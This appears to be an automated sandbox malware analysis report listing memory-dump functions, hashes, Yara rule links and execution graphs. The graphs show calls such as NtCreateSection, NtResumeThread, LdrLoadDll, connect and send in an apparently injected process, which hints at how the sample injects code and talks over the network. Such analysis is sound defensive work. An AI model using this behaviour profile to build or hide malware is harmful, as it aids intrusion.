                                                                                                                                                                                                                                  • Opcode ID: f61888a7a728f8d54d73029b6017522fe90d427511f267303fc31338331ff63b
                                                                                                                                                                                                                                  • Instruction ID: 0687ffb46d16b0790c588dcee20fcffbc2bd1aa72bf88f7b0dfff68a0f98c6bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f61888a7a728f8d54d73029b6017522fe90d427511f267303fc31338331ff63b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6890022120144542D94062585904B0F410597E1212F91C41EA5146D65CCA3588556721
                                                                                                                                                                                                                                  Function 014E2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 80504798358e7f296f6a703b55bf5e7f623d768894a94b56073ca765da2ab29d
                                                                                                                                                                                                                                  • Instruction ID: 94f7f1a85b2b90ae31139dab9866c3e47151b62abc021cc9f1233cc2b63c50ab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80504798358e7f296f6a703b55bf5e7f623d768894a94b56073ca765da2ab29d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4790022124100902D940715895147070006D7D0611F51C41AA1014D65DC736896576B1
                                                                                                                                                                                                                                  Function 014E2E50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 83c68296c977660207d7aca8648ab3d8e6c08c33cb8756c8b38c11ec0e58aceb
                                                                                                                                                                                                                                  • Instruction ID: d0ac4ee245e69056d7fca434345721eb61212b5a2402bea312aa90171f99a6a1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83c68296c977660207d7aca8648ab3d8e6c08c33cb8756c8b38c11ec0e58aceb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F590026134100542D90061585514B060005D7E1311F51C41EE2054D65DC739CC527126
                                                                                                                                                                                                                                  Function 014E2E00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 61eb51b097f2bb1bc2416cc9c7aedfe7c727a0bdc2794064869cefb7b4ff6b1a
                                                                                                                                                                                                                                  • Instruction ID: d7298f60a178d9c508b8a4c7e0b8f6a0bc5fc69dca0e2d113eace003fc2ebf68
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61eb51b097f2bb1bc2416cc9c7aedfe7c727a0bdc2794064869cefb7b4ff6b1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D190026120140503D94065585904607000597D0312F51C41AA3054D66ECB398C517135
                                                                                                                                                                                                                                  Function 014E2EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 228dc60a7a491debf371e18dcc4085c62c1c5247e4c5d2e483aab1e9c7e443c4
                                                                                                                                                                                                                                  • Instruction ID: 9ab45f2edc3827590453bce5a30a23a939dab38fcada9f4eaad2964dd37ec735
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 228dc60a7a491debf371e18dcc4085c62c1c5247e4c5d2e483aab1e9c7e443c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F90023120140502D90061585908747000597D0312F51C41AA6154D66EC775C8917531
                                                                                                                                                                                                                                  Function 014E2ED0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c1e8527e200788ea741999dcb7aa5592120eb982daaf50158d8d5af1a6d6a361
                                                                                                                                                                                                                                  • Instruction ID: a9dabf1519f723d36cdd12f35612e19b4aedeb63b6c28b34c6cd3436c092d104
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1e8527e200788ea741999dcb7aa5592120eb982daaf50158d8d5af1a6d6a361
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79900221601001424940716899449064005BBE1221B51C52AA1988D61DC67988656665
                                                                                                                                                                                                                                  Function 014E2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 21703012b1637833bc3d305daeed2accb9e8bf95e48c060f6d61f2e902497798
                                                                                                                                                                                                                                  • Instruction ID: c8fd508c20d2810f2f70fa89227b466b84c9ff5b0d077bc88c148c6ee5050870
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21703012b1637833bc3d305daeed2accb9e8bf95e48c060f6d61f2e902497798
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C090026121100142D90461585504706004597E1211F51C41BA3144D65CC6398C616125
                                                                                                                                                                                                                                  Function 014E2B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                  • Instruction ID: a6f2eaff3d1d6687145bd3e9951818d53de3c127e598db852fde00cfa75633e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Function 014D7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0151454D
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01514507
                                                                                                                                                                                                                                  • Execute=1, xrefs: 0151451E
                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 015144AB
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01514460
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01514530
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01514592
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                  • Opcode ID: 95ac67bb6115c9cfccc320aa0b04dcc65903d6a79aef2ef9d7241f6a86df9c6b
                                                                                                                                                                                                                                  • Instruction ID: 455b828c0b440dd302c0725ca761de07a019da23e6921a7b26cf18cd5a4b356c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95ac67bb6115c9cfccc320aa0b04dcc65903d6a79aef2ef9d7241f6a86df9c6b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99518031A0021A7AEF11AB95DC65FAE37A8FF14705F0404AFD605AB1A0E7709E41CF51
                                                                                                                                                                                                                                  Function 014A9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                                                                  • Opcode ID: d02745d784426f7011650622b48c6a12c665d5ba6d11c7b60b2f5e3c83e1cc34
                                                                                                                                                                                                                                  • Instruction ID: 1b9e9dd54afdf5fdeceabc08a9893da194d7d518a0360d7db19742a0baae83d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d02745d784426f7011650622b48c6a12c665d5ba6d11c7b60b2f5e3c83e1cc34
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3811BB1D002699BDB32CF94CC44BEEB6B8BB14754F0141EAEA19B7290D7709E85CF61

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:3.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:41
                                                                                                                                                                                                                                  Total number of Limit Nodes:3
                                                                                                                                                                                                                                  execution_graph 8644 3dbc75b 8645 3dbc75d SleepEx 8644->8645 8647 3dbc7bd NtCreateSection 8645->8647 8648 3dbc77b 8645->8648 8647->8648 8649 3514431 8651 3514481 8649->8651 8650 35144b5 connect 8651->8650 8652 35158d2 8653 3515900 8652->8653 8654 3515940 LdrLoadDll 8653->8654 8655 3515904 8653->8655 8654->8655 8656 350b8c7 8658 350b8ef 8656->8658 8657 350b96f 8658->8657 8659 350b941 CreateThread 8658->8659 8660 35144e6 8662 3514525 8660->8662 8661 3514559 closesocket 8662->8661 8663 350c508 8666 350c524 8663->8666 8664 350c5b4 8665 350c54b SleepEx 8665->8666 8666->8664 8666->8665 8668 350b038 8666->8668 8670 350b07a 8668->8670 8669 350b114 8669->8666 8669->8669 8670->8669 8671 350b0fd SleepEx 8670->8671 8671->8670 8672 3dc0a96 8673 3dc0a9b 8672->8673 8674 3dc0b94 8673->8674 8676 3dbc8e8 8673->8676 8679 3dbc90e 8676->8679 8677 3dbc930 8677->8674 8678 3dbc93f SleepEx 8678->8679 8681 3dbc973 8678->8681 8679->8677 8679->8678 8680 3dbc9ac NtResumeThread 8680->8677 8681->8677 8681->8680 8682 351423d 8683 3514290 8682->8683 8684 35142c4 socket 8683->8684 8685 351437e 8687 35143d1 8685->8687 8686 3514405 send 8687->8686

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 03DBC6E4 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 3dbc6e4-3dbc6e5 1 3dbc69e-3dbc6ca 0->1 2 3dbc6e7-3dbc6e9 0->2 3 3dbc6cc-3dbc6d6 1->3 4 3dbc717-3dbc74f 1->4 5 3dbc6eb-3dbc6fc 2->5 6 3dbc75d-3dbc779 SleepEx 2->6 8 3dbc66b-3dbc675 3->8 9 3dbc6d8-3dbc6dd 3->9 16 3dbc7bc 4->16 17 3dbc751 4->17 12 3dbc77b-3dbc77f 6->12 13 3dbc7bd-3dbc812 NtCreateSection 6->13 14 3dbc677-3dbc698 8->14 15 3dbc645-3dbc66a 8->15 9->4 18 3dbc793-3dbc798 12->18 19 3dbc781-3dbc78e call 3dc9988 12->19 21 3dbc79a-3dbc7a1 13->21 22 3dbc814-3dbc82d 13->22 14->1 15->8 18->21 19->18 25 3dbc7a3-3dbc7bb 21->25 22->21 27 3dbc833-3dbc872 22->27 25->16 27->21 29 3dbc878-3dbc8b6 27->29 29->21 31 3dbc8bc-3dbc8d4 29->31 31->25
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID: 0$@$@
                                                                                                                                                                                                                                  • API String ID: 3472027048-3221051908
                                                                                                                                                                                                                                  • Opcode ID: cb8249d6a1bd5ac243e9ec9b1298da009bd23a80d04c756c9d99e408cffb3656
                                                                                                                                                                                                                                  • Instruction ID: 5b1d8865003a8f79b06935edfbd1879122dbfad94ad1542a9c26b805ad27b947
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8249d6a1bd5ac243e9ec9b1298da009bd23a80d04c756c9d99e408cffb3656
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C361CBB1A28708CFCB15DF28D8856DABBF4FB48710F10056EE98A97250D735E546CB86
                                                                                                                                                                                                                                  Function 03DBC8E8 Relevance: 3.1, APIs: 2, Instructions: 92nativethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeSleepThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1530989685-0
                                                                                                                                                                                                                                  • Opcode ID: bc923be69e2868fb6495ab3df1b2107e9e5cd883f4d7cc605d11746b0018070a
                                                                                                                                                                                                                                  • Instruction ID: 4a472f743923bdbe936439d6f1de8e48b393947785d11962dc1a883a49258e5f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc923be69e2868fb6495ab3df1b2107e9e5cd883f4d7cc605d11746b0018070a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0921B674628B4E8FEB58DF2884447AAB7E5FB84311F50062ED89BC3290EF30D5419785
                                                                                                                                                                                                                                  Function 0350B038 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 52 350b038-350b074 53 350b07a-350b07e 52->53 54 350b084-350b087 53->54 55 350b105-350b10e 53->55 54->55 56 350b089-350b0fb call 3517ff8 call 3517fc8 call 3518738 54->56 55->53 57 350b114-350b11d 55->57 56->55 71 350b0fd-350b103 SleepEx 56->71 59 350b15f-350b17c 57->59 60 350b11f-350b126 57->60 62 350b144-350b14d 60->62 63 350b128-350b12f 60->63 62->59 64 350b14f-350b156 62->64 66 350b138-350b142 63->66 64->59 67 350b158-350b159 64->67 66->62 66->66 67->59 71->55
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                  • Opcode ID: 8a6a6a3e9cc70d1dc9e80c9bc799f60c24896243544604285178a5b740248b58
                                                                                                                                                                                                                                  • Instruction ID: 20c372c0aecad87239bfc985ddda25513f70952049cf660038e2c982eb630fc0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a6a6a3e9cc70d1dc9e80c9bc799f60c24896243544604285178a5b740248b58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4931D77151CB488FDB28DF0CE4C56EA73E0FB85311F40025ED88B87256DA31E542CA97
                                                                                                                                                                                                                                  Function 0350B7F9 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 72 350b7f9-350b80f 73 350b811-350b817 72->73 74 350b81b-350b83b 72->74 75 350b848 73->75 76 350b819-350b81a 73->76 77 350b868-350b86a 74->77 78 350b83d-350b83e 74->78 81 350b84a-350b851 75->81 82 350b87b-350b889 75->82 76->74 79 350b86c-350b878 77->79 80 350b843-350b844 78->80 79->82 80->75 81->80 85 350b853-350b85b 81->85 83 350b892-350b8bb 82->83 84 350b88d call 3517ff8 82->84 84->83 85->79 89 350b85d-350b864 85->89 89->77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9750f6f8b0048cc194fceb117161c7283df10d75160a7ec3da475a872f668274
                                                                                                                                                                                                                                  • Instruction ID: 7a084538a07ebedf8ea3b0d03c5cb7ebff60f2282cf26de9b49d2b94362bf449
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9750f6f8b0048cc194fceb117161c7283df10d75160a7ec3da475a872f668274
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0415832518A498FEB19DF68E4C579AB7F0FF98310F48056DD8C9CB1A2CB26D4568781
                                                                                                                                                                                                                                  Function 0350C508 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 90 350c508-350c547 call 35072f8 call 35175e8 95 350c5b4-350c5c3 90->95 96 350c549 90->96 97 350c54b-350c55d SleepEx 96->97 98 350c5a1-350c5a8 97->98 99 350c55f-350c563 97->99 98->97 100 350c5aa-350c5b2 call 350c498 98->100 99->97 101 350c565-350c56f 99->101 100->97 101->97 103 350c571-350c577 101->103 103->97 104 350c579-350c57f 103->104 104->97 106 350c581-350c592 call 35129f8 call 350b038 104->106 110 350c597-350c59f call 350b188 106->110 110->97
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                  • Opcode ID: 9fda6ab913c1cf9d9c7ea49dca79d529e1f102db145d1761653025e5ff2397b4
                                                                                                                                                                                                                                  • Instruction ID: c124e526d5e70ee8499ffafeb486583c5377dc8d0ada917dd35ae09389e109cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fda6ab913c1cf9d9c7ea49dca79d529e1f102db145d1761653025e5ff2397b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22118178618B188FDB55DF6CD48066972A0FB8A704F4407BDD84ACB2A5CB25C4418642
                                                                                                                                                                                                                                  Function 03DBC708 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 127 3dbc708-3dbc70b 128 3dbc70d-3dbc711 127->128 129 3dbc763-3dbc779 SleepEx 127->129 132 3dbc73c-3dbc74f 128->132 133 3dbc713-3dbc73b 128->133 130 3dbc77b-3dbc77f 129->130 131 3dbc7bd-3dbc812 NtCreateSection 129->131 136 3dbc793-3dbc798 130->136 137 3dbc781-3dbc78e call 3dc9988 130->137 138 3dbc79a-3dbc7a1 131->138 139 3dbc814-3dbc82d 131->139 134 3dbc7bc 132->134 135 3dbc751 132->135 133->132 136->138 137->136 141 3dbc7a3-3dbc7bb 138->141 139->138 144 3dbc833-3dbc872 139->144 141->134 144->138 146 3dbc878-3dbc8b6 144->146 146->138 148 3dbc8bc-3dbc8d4 146->148 148->141
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183790113877.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03B80000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3b80000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                  • Opcode ID: 13db18ff0bc38ace720893755206d796dc479861caebfcc2033ac57132167463
                                                                                                                                                                                                                                  • Instruction ID: b6203dcacb8647ea5f167b37c60a52d15f7818e1a55064fa58e7fba6ab31e304
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13db18ff0bc38ace720893755206d796dc479861caebfcc2033ac57132167463
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF115C7296C784CBD70A9F68A8561E9B3B6FB41374B28015FC0950B562D737C443C3C9
                                                                                                                                                                                                                                  Function 0351437E Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 113 351437e-35143d9 call 3510f88 116 3514405-3514430 send 113->116 117 35143db-35143ff call 35175e8 113->117 117->116
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                                                                                  • Opcode ID: 7468e9ffd2b506aaf7e2ad96cff0a6aae504675720aaa2101655a7a7d67c119a
                                                                                                                                                                                                                                  • Instruction ID: 0793175131f56494961a21faf54363b75889c4043c5107a7d65e7ffdc1780373
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7468e9ffd2b506aaf7e2ad96cff0a6aae504675720aaa2101655a7a7d67c119a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11547051CB448FDB58EF18A48865677F1FF9C300F1405AEE88DC729ADE709491C796
                                                                                                                                                                                                                                  Function 03514431 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 120 3514431-3514489 call 3511018 123 35144b5-35144d8 connect 120->123 124 351448b-35144af call 35175e8 120->124 124->123
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.183789647493.0000000003490000.00000040.80000000.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_3490000_RAVCpl64.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1959786783-0
                                                                                                                                                                                                                                  • Opcode ID: af6a1a0fad49da2a1fd0c6ac182853b95ce911b1d4515d9ae85680afe2b3acaf
                                                                                                                                                                                                                                  • Instruction ID: 691056fabebc70c9a17b688c58aff34989f722e632e22830582458f01f99a4e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af6a1a0fad49da2a1fd0c6ac182853b95ce911b1d4515d9ae85680afe2b3acaf
